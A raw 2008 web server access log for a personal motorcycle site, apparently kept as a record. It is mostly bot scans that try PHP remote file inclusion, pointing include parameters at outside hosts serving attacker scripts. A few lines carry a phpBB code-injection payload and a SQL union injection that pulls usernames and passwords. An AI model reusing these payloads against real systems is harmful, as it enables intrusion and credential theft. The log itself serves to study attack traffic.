64.22.89.194 - - [23/Apr/2008:09:55:58 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:09:56:02 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:09:56:16 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.176.226.180 - - [23/Apr/2008:09:56:38 -0700] "GET /logs/access_080214.log/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.graficamidiarte.com.br/admin/uploads/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [23/Apr/2008:09:56:39 -0700] "GET /admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.graficamidiarte.com.br/admin/uploads/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [23/Apr/2008:09:56:39 -0700] "GET /logs/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.graficamidiarte.com.br/admin/uploads/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.182.143 - - [23/Apr/2008:09:56:49 -0700] "GET /logs/access_071219.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.cnm.gob.pe/cnm/cache/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.232.156.130 - - [23/Apr/2008:09:57:01 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [23/Apr/2008:09:57:01 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [23/Apr/2008:09:57:01 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.117.106.4 - - [23/Apr/2008:09:57:35 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://it.geocities.com/bigli0np0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:09:57:50 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:09:57:50 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:09:57:50 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:09:58:09 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:09:58:31 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:09:58:31 -0700] "GET //skin/zero_vote/error.php?dir=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:09:58:31 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:59:15 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:59:15 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:59:15 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:09:59:23 -0700] "GET /logs/access_080124.log/cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:09:59:23 -0700] "GET /logs/cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.51.45 - - [23/Apr/2008:09:59:30 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:59:31 -0700] "GET /logs/access_080130.log//agendax/addevent.inc.php?agendax_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:09:59:35 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:09:59:48 -0700] "GET /logs/access_080304.log//include.php?path[docroot]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:09:59:48 -0700] "GET //include.php?path[docroot]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:09:59:48 -0700] "GET /logs//include.php?path[docroot]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.176.226.180 - - [23/Apr/2008:10:00:04 -0700] "GET /logs/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.graficamidiarte.com.br/admin/uploads/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [23/Apr/2008:10:00:05 -0700] "GET /admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.graficamidiarte.com.br/admin/uploads/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:00:11 -0700] "GET /logs/access_080121.log/cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:10:00:31 -0700] "GET /logs/access_080218.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.232.156.130 - - [23/Apr/2008:10:01:39 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.117.106.4 - - [23/Apr/2008:10:01:59 -0700] "GET /logs/access_080308.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://it.geocities.com/bigli0np0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.117.106.4 - - [23/Apr/2008:10:01:59 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://it.geocities.com/bigli0np0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.117.106.4 - - [23/Apr/2008:10:02:00 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://it.geocities.com/bigli0np0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.117.106.4 - - [23/Apr/2008:10:02:15 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://it.geocities.com/bigli0np0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:03:40 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:03:40 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [23/Apr/2008:10:04:28 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [23/Apr/2008:10:04:28 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [23/Apr/2008:10:04:29 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [23/Apr/2008:10:04:39 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.118.170.87 - - [23/Apr/2008:10:05:00 -0700] "GET /logs/access_071219.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.206.47.131 - - [23/Apr/2008:10:05:31 -0700] "GET /bikes HTTP/1.1" 301 90 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
63.206.47.131 - - [23/Apr/2008:10:05:31 -0700] "GET /bikes/ HTTP/1.1" 200 2457 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
63.206.47.131 - - [23/Apr/2008:10:05:34 -0700] "GET /bikes/cb750K6/ HTTP/1.1" 200 1626 "http://www.dmulk.com/bikes/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
63.206.47.131 - - [23/Apr/2008:10:05:37 -0700] "GET /bikes/cb750K6/001.JPG HTTP/1.1" 200 3829760 "http://www.dmulk.com/bikes/cb750K6/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
74.6.11.245 - - [23/Apr/2008:10:05:42 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:05:48 -0700] "GET /logs/admin/auth.php?xcart_dir=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:05:48 -0700] "GET /admin/auth.php?xcart_dir=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
63.206.47.131 - - [23/Apr/2008:10:05:51 -0700] "GET /bikes/cb750K6/002.JPG HTTP/1.1" 200 3702885 "http://www.dmulk.com/bikes/cb750K6/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
63.206.47.131 - - [23/Apr/2008:10:06:04 -0700] "GET /bikes/cb750K6/003.JPG HTTP/1.1" 200 3672960 "http://www.dmulk.com/bikes/cb750K6/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
63.206.47.131 - - [23/Apr/2008:10:06:11 -0700] "GET /bikes/cb750K6/004.JPG HTTP/1.1" 200 3946956 "http://www.dmulk.com/bikes/cb750K6/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
67.195.51.243 - - [23/Apr/2008:10:06:15 -0700] "GET / HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.206.47.131 - - [23/Apr/2008:10:06:18 -0700] "GET /bikes/cb750K6/005.JPG HTTP/1.1" 200 3590651 "http://www.dmulk.com/bikes/cb750K6/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
63.206.47.131 - - [23/Apr/2008:10:06:25 -0700] "GET /bikes/cb750K6/006.JPG HTTP/1.1" 200 2930658 "http://www.dmulk.com/bikes/cb750K6/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
63.206.47.131 - - [23/Apr/2008:10:06:33 -0700] "GET /bikes/cb750K6/007.JPG HTTP/1.1" 200 3756952 "http://www.dmulk.com/bikes/cb750K6/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
63.206.47.131 - - [23/Apr/2008:10:06:39 -0700] "GET /bikes/cb750K6/008.JPG HTTP/1.1" 200 3130938 "http://www.dmulk.com/bikes/cb750K6/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:06:48 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.176.161.208 - - [23/Apr/2008:10:07:36 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.176.161.208 - - [23/Apr/2008:10:07:40 -0700] "GET //Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.176.161.208 - - [23/Apr/2008:10:07:40 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [23/Apr/2008:10:07:53 -0700] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
67.212.173.42 - - [23/Apr/2008:10:07:53 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
217.198.149.20 - - [23/Apr/2008:10:08:26 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.176.161.208 - - [23/Apr/2008:10:08:34 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.91.224.9 - - [23/Apr/2008:10:08:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
213.246.51.45 - - [23/Apr/2008:10:08:56 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
77.91.224.9 - - [23/Apr/2008:10:08:56 -0700] "GET /presto/?S=A HTTP/1.1" 200 526 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:10:15 -0700] "GET /logs/access_080227.log//include.php?path[docroot]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:10:33 -0700] "GET //include.php?path[docroot]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.87.175.3 - - [23/Apr/2008:10:11:48 -0700] "GET /logs/access_080108.log/index1.php?choix=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.175.3 - - [23/Apr/2008:10:11:48 -0700] "GET /index1.php?choix=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.175.3 - - [23/Apr/2008:10:11:48 -0700] "GET /logs/index1.php?choix=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.56.36 - - [23/Apr/2008:10:12:22 -0700] "GET /logs/access_080218.log//skin/zero_vote/error.php?dir=http://gemblog.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.246 - - [23/Apr/2008:10:12:28 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.87.175.3 - - [23/Apr/2008:10:12:46 -0700] "GET /logs/access_080321.log/index1.php?choix=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:14:00 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:14:01 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:14:01 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.91.224.9 - - [23/Apr/2008:10:14:07 -0700] "GET /blog/xmlrpc.php HTTP/1.1" 200 59 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
77.91.224.9 - - [23/Apr/2008:10:14:48 -0700] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1013 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
87.106.103.122 - - [23/Apr/2008:10:15:29 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.122 - - [23/Apr/2008:10:15:30 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.122 - - [23/Apr/2008:10:15:32 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:15:38 -0700] "GET /logs/access_080215.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.61.144.44 - - [23/Apr/2008:10:15:39 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.106.103.122 - - [23/Apr/2008:10:15:52 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.122 - - [23/Apr/2008:10:16:18 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:17:03 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:17:04 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.26.52.49 - - [23/Apr/2008:10:17:10 -0700] "GET /logs/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x4861636B20427920436176616C657261,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
217.26.52.49 - - [23/Apr/2008:10:17:13 -0700] "GET /index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x4861636B20427920436176616C657261,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 200 11602 "-" "libwww-perl/5.805" "dmulk.com"
77.91.224.9 - - [23/Apr/2008:10:17:17 -0700] "GET /blog/ HTTP/1.1" 200 11611 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
67.212.173.42 - - [23/Apr/2008:10:17:29 -0700] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
67.212.173.42 - - [23/Apr/2008:10:17:29 -0700] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:17:40 -0700] "GET /logs/access.log/?CONFIG[pear_dir]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:17:45 -0700] "GET /?CONFIG[pear_dir]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:17:46 -0700] "GET /logs/?CONFIG[pear_dir]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 44410 "-" "libwww-perl/5.811" "www.dmulk.com"
77.91.224.9 - - [23/Apr/2008:10:18:15 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.1" 200 10625 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
210.118.170.87 - - [23/Apr/2008:10:18:16 -0700] "GET /logs/access_071224.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.212.173.42 - - [23/Apr/2008:10:18:29 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [23/Apr/2008:10:18:29 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [23/Apr/2008:10:18:30 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.159.68.165 - - [23/Apr/2008:10:18:41 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jentshin.new21.org/zboard_eng//data/cmd/inc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:18:59 -0700] "GET /logs/access_080309.log/?CONFIG[pear_dir]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:10:19:07 -0700] "GET /modules/My_eGallery/index.php?basepath=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.126.174.50 - - [23/Apr/2008:10:19:09 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
